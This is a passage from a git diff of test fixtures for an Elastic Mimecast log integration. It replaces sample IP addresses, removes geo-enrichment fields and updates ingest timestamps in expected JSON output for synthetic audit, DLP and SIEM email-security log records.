+0100 IP: 67.43.156.15 Application: Administration Console" } }, { @@ -966,7 +711,7 @@ }, "event": { "action": "user-password-changed", - "ingested": "2021-11-25T11:34:08.372346400Z", + "ingested": "2021-12-09T15:16:03.637576500Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR\",\"auditType\":\"User Password Changed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:56:55+0000\",\"eventInfo\":\"Password reset for user: johndoe@example.com User Password Changed, Remote IP is null\",\"category\":\"user_account_and_role_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR" }, @@ -994,31 +739,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "remediation-incident-adjustment", - "ingested": "2021-11-25T11:34:08.372347400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:49:30+0000\",\"eventInfo\":\"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\\\"fileHash\\\":\\\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\\\",\\\"start\\\":\\\"2021-09-12T19:48:59+0000\\\",\\\"end\\\":\\\"2021-10-12T19:48:59+0000\\\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"account_logs\"}", + "ingested": "2021-12-09T15:16:03.637582900Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:49:30+0000\",\"eventInfo\":\"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\\\"fileHash\\\":\\\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\\\",\\\"start\\\":\\\"2021-09-12T19:48:59+0000\\\",\\\"end\\\":\\\"2021-10-12T19:48:59+0000\\\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w", "type": "type : manual", "created": "2021-10-12T19:49:30.000Z" @@ -1034,7 +764,7 @@ "mimecast": { "application": "Administration Console", "category": "account_logs", - "eventInfo": "Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\"fileHash\":\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\",\"start\":\"2021-09-12T19:48:59+0000\",\"end\":\"2021-10-12T19:48:59+0000\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\"fileHash\":\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\",\"start\":\"2021-09-12T19:48:59+0000\",\"end\":\"2021-10-12T19:48:59+0000\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 67.43.156.15, Application: Administration Console" } }, { @@ -1048,31 +778,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-restore", - "ingested": "2021-11-25T11:34:08.372348400Z", - "original": "{\"id\":\"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:20:01+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"archive_service_logs\"}", + "ingested": "2021-12-09T15:16:03.637588800Z", + "original": "{\"id\":\"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:20:01+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw", "created": "2021-10-12T19:20:01.000Z" }, @@ -1087,7 +802,7 @@ "mimecast": { "application": "Administration Console", "category": "archive_service_logs", - "eventInfo": "Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 67.43.156.15, Application: Administration Console" } }, { @@ -1101,31 +816,16 @@ "johndoejr@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-restore", - "ingested": "2021-11-25T11:34:08.372349300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoejr@example.com\",\"eventTime\":\"2021-10-12T18:19:33+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"archive_service_logs\"}", + "ingested": "2021-12-09T15:16:03.637594800Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoejr@example.com\",\"eventTime\":\"2021-10-12T18:19:33+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84", "created": "2021-10-12T18:19:33.000Z" }, @@ -1140,7 +840,7 @@ "mimecast": { "application": "Administration Console", "category": "archive_service_logs", - "eventInfo": "Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 67.43.156.15, Application: Administration Console" } }, { @@ -1154,31 +854,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-export-download", - "ingested": "2021-11-25T11:34:08.372350300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0\",\"auditType\":\"Archive Mailbox Export Download\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:55:14+0000\",\"eventInfo\":\"Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"archive_service_logs\"}", + "ingested": "2021-12-09T15:16:03.637600700Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0\",\"auditType\":\"Archive Mailbox Export Download\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:55:14+0000\",\"eventInfo\":\"Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0", "created": "2021-10-12T17:55:14.000Z" }, @@ -1193,7 +878,7 @@ "mimecast": { "application": "Administration Console", "category": "archive_service_logs", - "eventInfo": "Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 67.43.156.15, Application: Administration Console" } }, { @@ -1207,31 +892,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "review-set-action", - "ingested": "2021-11-25T11:34:08.372351300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul\",\"auditType\":\"Review Set Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:07:00+0000\",\"eventInfo\":\"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 8.8.8.8, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", + "ingested": "2021-12-09T15:16:03.637606400Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul\",\"auditType\":\"Review Set Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:07:00+0000\",\"eventInfo\":\"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul", "created": "2021-10-12T17:07:00.000Z" }, @@ -1246,7 +916,7 @@ "mimecast": { "application": "mimecast-case-review", "category": "case_review_logs", - "eventInfo": "Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 8.8.8.8, Application: mimecast-case-review" + "eventInfo": "Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 67.43.156.15, Application: mimecast-case-review" } }, { @@ -1260,31 +930,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "remediation-incident-adjustment", - "ingested": "2021-11-25T11:34:08.372352300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T15:38:05+0000\",\"eventInfo\":\"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\\\"unremediateCode\\\":\\\"TR-C46A75-01419-M\\\",\\\"from\\\":\\\"gmail.com\\\",\\\"start\\\":\\\"2021-10-10T15:33:49+0000\\\",\\\"end\\\":\\\"2021-10-12T15:33:49+0000\\\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"account_logs\"}", + "ingested": "2021-12-09T15:16:03.637611100Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T15:38:05+0000\",\"eventInfo\":\"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\\\"unremediateCode\\\":\\\"TR-C46A75-01419-M\\\",\\\"from\\\":\\\"gmail.com\\\",\\\"start\\\":\\\"2021-10-10T15:33:49+0000\\\",\\\"end\\\":\\\"2021-10-12T15:33:49+0000\\\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38", "type": "type : restore", "created": "2021-10-12T15:38:05.000Z" @@ -1300,7 +955,7 @@ "mimecast": { "application": "Administration Console", "category": "account_logs", - "eventInfo": "Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\"unremediateCode\":\"TR-C46A75-01419-M\",\"from\":\"gmail.com\",\"start\":\"2021-10-10T15:33:49+0000\",\"end\":\"2021-10-12T15:33:49+0000\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\"unremediateCode\":\"TR-C46A75-01419-M\",\"from\":\"gmail.com\",\"start\":\"2021-10-10T15:33:49+0000\",\"end\":\"2021-10-12T15:33:49+0000\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 67.43.156.15, Application: Administration Console" } } ] diff --git a/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json b/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json index 7bba78b2f50..478ae824720 100644 --- a/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json +++ b/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "hold", - "ingested": "2021-11-25T11:34:10.753237800Z", + "ingested": "2021-12-09T15:16:05.359023300Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:25+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204122.2CA6DFCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:25+0000" }, @@ -39,7 +39,7 @@ }, "event": { "action": "notification", - "ingested": "2021-11-25T11:34:10.753244800Z", + "ingested": "2021-12-09T15:16:05.359032800Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:25+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204122.2CA6DFCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:25+0000" }, @@ -68,7 +68,7 @@ }, "event": { "action": "hold", - "ingested": "2021-11-25T11:34:10.753246400Z", + "ingested": "2021-12-09T15:16:05.359038900Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:22+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204119.F16C2FCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:22+0000" }, @@ -97,7 +97,7 @@ }, "event": { "action": "notification", - "ingested": "2021-11-25T11:34:10.753248100Z", + "ingested": "2021-12-09T15:16:05.359044900Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:22+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204119.F16C2FCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:22+0000" }, @@ -126,7 +126,7 @@ }, "event": { "action": "notification", - "ingested": "2021-11-25T11:34:10.753249600Z", + "ingested": "2021-12-09T15:16:05.359050800Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:21+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204118.05EA6FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:21+0000" }, @@ -155,7 +155,7 @@ }, "event": { "action": "hold", - "ingested": "2021-11-25T11:34:10.753250900Z", + "ingested": "2021-12-09T15:16:05.359056700Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:21+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204118.05EA6FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:21+0000" }, @@ -184,7 +184,7 @@ }, "event": { "action": "notification", - "ingested": "2021-11-25T11:34:10.753252100Z", + "ingested": "2021-12-09T15:16:05.359062400Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:19+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204116.6A8CFFCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:19+0000" }, @@ -213,7 +213,7 @@ }, "event": { "action": "hold", - "ingested": "2021-11-25T11:34:10.753253400Z", + "ingested": "2021-12-09T15:16:05.359068200Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:19+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204116.6A8CFFCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:19+0000" }, @@ -242,7 +242,7 @@ }, "event": { "action": "hold", - "ingested": "2021-11-25T11:34:10.753254700Z", + "ingested": "2021-12-09T15:16:05.359078400Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:17+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204114.8AE40FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:17+0000" }, @@ -271,7 +271,7 @@ }, "event": { "action": "notification", - "ingested": "2021-11-25T11:34:10.753256Z", + "ingested": "2021-12-09T15:16:05.359084700Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:17+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204114.8AE40FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:17+0000" }, diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log index b65f8d01799..70cbfff0565 100644 --- a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log @@ -1,7 +1,7 @@ {"Act":"Hld","AttCnt":0,"AttNames":null,"AttSize":0,"Content-Disposition":"attachment; filename=\"process_20211018093329655.json\"","Hld":"Spm","MsgId":"\u003cINX.164dae0719be95da77068c7d264.3e915.e7719.c78c.17c926a3231ace@newsletter.77onlineshop.eu\u003e","MsgSize":157436,"Sender":"bounce_9244+cdaahhimyaaaaagaad5ekqaaaaaaaaeribenpq@newsletter.77onlineshop.eu","Subject":"Hi Sandra! Neue Styles eingetroffen! – Finde deinen Lieblings-Look!","aCode":"HhuwRf_AOcuJZINE2ZgcKw","acc":"ABC123","datetime":"2021-10-18T09:02:43+0100"} -{"acc":"ABC123","Delivered":false,"IP":"8.8.8.8","RejType":"Recipient email address is possibly incorrect","RejCode":"550","AttCnt":0,"Dir":"Inbound","ReceiptAck":null,"MsgId":null,"Subject":null,"Latency":505,"Sender":"<>","datetime":"2021-10-19T07:06:40+0100","Rcpt":"johndoe@example.com","AttSize":0,"Attempt":1,"RejInfo":"5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]","TlsVer":"TLSv1.2","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","Snt":125,"aCode":"29be076e-44cd-354d-a7c2-083d4a312371","UseTls":"Yes","Route":"Office365","Content-Disposition":"attachment; 